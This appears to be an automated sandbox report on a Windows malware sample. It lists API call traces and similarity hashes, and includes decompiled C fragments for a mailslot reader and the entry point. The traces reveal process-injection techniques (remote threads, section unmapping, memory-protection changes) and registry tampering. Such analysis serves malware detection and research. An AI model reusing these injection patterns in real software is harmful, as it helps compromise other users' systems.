  • InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5
    • Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
  • InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
  • SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
  • CloseHandle.KERNEL32 ref: 002E1141
  • HeapDestroy.KERNEL32 ref: 002E114E
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64 Total matches: 190memorysleepfile
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}















0x00401033
0x0040103d
0x0040104c
0x0040104f
0x00401057
0x0040105a
0x004010d6
0x004010dc
0x004010df
0x0040105c
0x00401062
0x00401066
0x004010c4
0x004010c4
0x00401068
0x00401068
0x00401076
0x0040107e
0x004010a4
0x004010ad
0x004010b0
0x004010b2
0x00000000
0x004010b2
0x00401080
0x00401080
0x00401086
0x00401092
0x00401098
0x0040109c
0x00000000
0x0040109e
0x0040109e
0x00000000
0x0040109e
0x0040109c
0x00000000
0x004010b5
0x004010b7
0x004010bd
0x004010c2
0x004010cb
0x004010ce
0x004010ce
0x004010e6
0x004010e8
0x004010eb
0x004010ee
0x004010ee
0x004010f8

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1673, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 194file
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
  • Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
  • Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
  • Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
APIs
  • CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
  • GetLastError.KERNEL32(?,002E7494), ref: 002E16F3
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E22D2, Relevance: 9.1, APIs: 6, Instructions: 105 Total matches: 307threadsynchronizationinjection
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
  • Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
  • Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
  • Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
APIs
  • memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
    • Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
    • Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
    • Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
  • ResumeThread.KERNELBASE(?), ref: 002E2418
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81
  • ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
  • SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
    • Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
    • Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
    • Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
  • GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2427, Relevance: 9.1, APIs: 6, Instructions: 78 Total matches: 154threadinjection
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: fc6ed82c56bfa57ab6fc962b82ba81a2bd1eb2d9df591a1fbb7d31c039fc64dc
  • Instruction ID: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
  • Opcode Fuzzy Hash: 1CE055000D66E7C19832E052E490BB2A246FE0120EA8C2B30022C24723AF0935572A8C
  • Instruction Fuzzy Hash: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
APIs
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
  • OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
  • CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
  • CloseHandle.KERNEL32(?), ref: 002E24E0
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E32C5, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 223libraryloader
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 4e39e43a056f2dbc5d7c37fe404edc70e416bd2b8df7daf7df2d9869e76f3aeb
  • Instruction ID: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
  • Opcode Fuzzy Hash: A5D05E444F5C37C94021B9D2E46EB7122D13EA02DD4CC31A11258609175F3132EB4A7D
  • Instruction Fuzzy Hash: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
APIs
  • GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
  • GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
  • OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
  • IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
  • CloseHandle.KERNEL32(002E74A4), ref: 002E3331
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E421D, Relevance: 6.1, APIs: 4, Instructions: 99 Total matches: 294registrysynchronization
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
  • Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
  • Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
  • Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
    • Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
    • Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
    • Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
    • Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
    • Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
    • Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
    • Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
    • Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
    • Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
    • Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
    • Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7
    • Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
    • Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
  • CloseHandle.KERNEL32(?), ref: 002E3400
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401000, Relevance: 6.0, APIs: 4, Instructions: 16 Total matches: 141memorythread
Similarity
  • Total matches: 141
  • API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
  • String ID:
  • API String ID: 1629895477-0
  • Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
  • Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
  • Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
  • Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
C-Code - Quality: 100%
			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed
				_t2 = HeapCreate(0, 0x10000, 0); // executed
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401639(_t2, _t4); // executed
				}
				ExitThread(_t3);
			}






0x00401012
0x00401014
0x0040101c
0x00401026
0x0040101e
0x0040101f
0x0040101f
0x0040102d

APIs
  • GetModuleHandleA.KERNEL32(00000000), ref: 00401003
  • HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
  • GetLastError.KERNEL32 ref: 00401026
  • ExitThread.KERNEL32 ref: 0040102D
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1186, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56 Total matches: 157memory
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
  • Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
  • Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
  • Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
APIs
    • Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610
    • Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
    • Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
    • Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Function 002E4B73, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 218stringthreadtime
Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
  • Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
  • Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
  • Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
APIs
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
  • lstrcpy.KERNEL32(00000000), ref: 002E4BE0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E29FB, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 305
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
  • Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
  • Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
  • Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
  • GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
  • GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2CD0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108 Total matches: 183string
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
  • Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
  • Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
  • Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
APIs
  • memset.NTDLL ref: 002E2CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
  • lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
  • lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
  • lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • wsprintfW.USER32 ref: 002E2DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
  • CoUninitialize.OLE32 ref: 002E2DF7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E4B0D, Relevance: 9.0, APIs: 6, Instructions: 40 Total matches: 320file
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
